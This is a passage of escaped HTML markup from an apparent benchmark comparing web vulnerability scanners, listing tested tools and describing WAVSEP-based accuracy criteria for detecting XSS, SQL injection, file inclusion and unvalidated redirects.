&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WSTool&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v0.14001&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;crawlfish&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v0.92&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Gamja&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.6&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;iScan&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v0.1&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;LoverBoy&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.0&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;openAcunetix&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v0.1&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;ScreamingCSS&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.02&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Secubat&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v0.5&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;SQID (SQL Injection Digger)&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; v0.3&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;SQLiX&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.0&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;VulnDetector&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v0.0.2&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.0pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Web Injection Scanner&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; (WIS) v0.4&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;XSSS&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v0.40&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0cm 5.4pt 0cm 5.4pt; width: 142.05pt;&quot; valign=&quot;top&quot; width=&quot;189&quot;&gt;&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Priamos&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;
  v1.0&lt;b&gt;&lt;i&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;For a full list of commercial &amp;amp; open source tools that
were &lt;b&gt;not&lt;/b&gt; tested in this benchmark, refer to the appendix.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif;&quot;&gt;&lt;u&gt;&lt;span style=&quot;font-size: x-large;&quot;&gt;3. Benchmark Overview &amp;amp; Assessment Criteria&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;The benchmark focused on testing commercial &amp;amp; open
source tools that are able to &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;detect&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; (and not necessarily exploit)
security vulnerabilities on a wide range of URLs, and thus, each tool tested
was required to support the following features:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)The ability to detect Reflected XSS and/or
SQL Injection and/or Path Traversal/Local File Inclusion/Remote File Inclusion
vulnerabilities.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)The ability to scan multiple URLs at once
(using either a crawler/spider feature, URL/Log file parsing feature or a
built-in proxy).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-ascii-theme-font: major-bidi; mso-bidi-theme-font: major-bidi; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;; mso-hansi-theme-font: major-bidi;&quot;&gt;(*)The ability to control and limit the scan to
internal or external host (domain/IP).&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The testing procedure of all the tools included the
following phases:&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Feature Documentation&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The features of each scanner were documented and compared,
according to documentation, configuration, plugins and information received
from the vendor.&lt;b&gt; &lt;/b&gt;The features were then divided into groups, which were
used to compose various hierarchal charts.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;Accuracy Assessment&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The fact that a scanner supports a certain category of
tests, does not say anything on &lt;b&gt;HOW WELL&lt;/b&gt; it is able to detect the
supported issues. The purpose of the accuracy assessment is to see how
effective each scanner is in detecting a variety of vulnerabilities, and to see
whether or not the detection logic &quot;settles&quot; for simple scenarios, or
covers a collection of &lt;b&gt;common&lt;/b&gt; and &lt;b&gt;advanced&lt;/b&gt; scenarios.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The scanners were all tested against the latest version of &lt;/span&gt;&lt;a href=&quot;http://code.google.com/p/wavsep/&quot;&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WAVSEP&lt;/span&gt;&lt;/a&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt; (v1.5), a benchmarking platform designed to assess the
detection accuracy of web application scanners, which was released alongside
the publication of this benchmark.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The purpose of WAVSEP’s test cases is to provide a scale for
understanding which detection barriers each scanning tool can bypass, and which
&lt;b&gt;&lt;u&gt;common&lt;/u&gt;&lt;/b&gt; vulnerability variations can be detected by each tool. &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;WAVSEP 1.5 added includes test cases from ZAP-WAVE, code
contributions from various volunteers and a collection of &lt;b&gt;250+&lt;/b&gt; &lt;b&gt;NEW&lt;/b&gt;
test cases for two new exposures: &lt;b&gt;unvalidated redirect&lt;/b&gt; and &lt;b&gt;obsolete/hidden
files&lt;/b&gt;.&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;u&gt;&lt;span style=&quot;font-family: &amp;quot;Times New Roman&amp;quot;,&amp;quot;serif&amp;quot;; font-size: 12.0pt; mso-fareast-font-family: &amp;quot;Times New Roman&amp;quot;;&quot;&gt;The various scanners were tested against the following &lt;b&gt;test
cases&lt;/b&gt; (GET/POST):&lt;/span&gt;&lt;/u&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; dir=&quot;LTR&quot; style=&quot;direction: ltr; margin-bottom: 0.0001pt; unicode-bidi: embed;&quot;&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;60&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt; test cases that were vulnerable to &lt;/span&gt;&lt;b style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;Phishing
via Unvalidated Redirect&lt;/b&gt;&lt;span style=&quot;font-family: &#39;Times New Roman&#39;, serif; font-size: 12pt;&quot;&gt;.&lt;/span&gt;&lt;/li&gt;
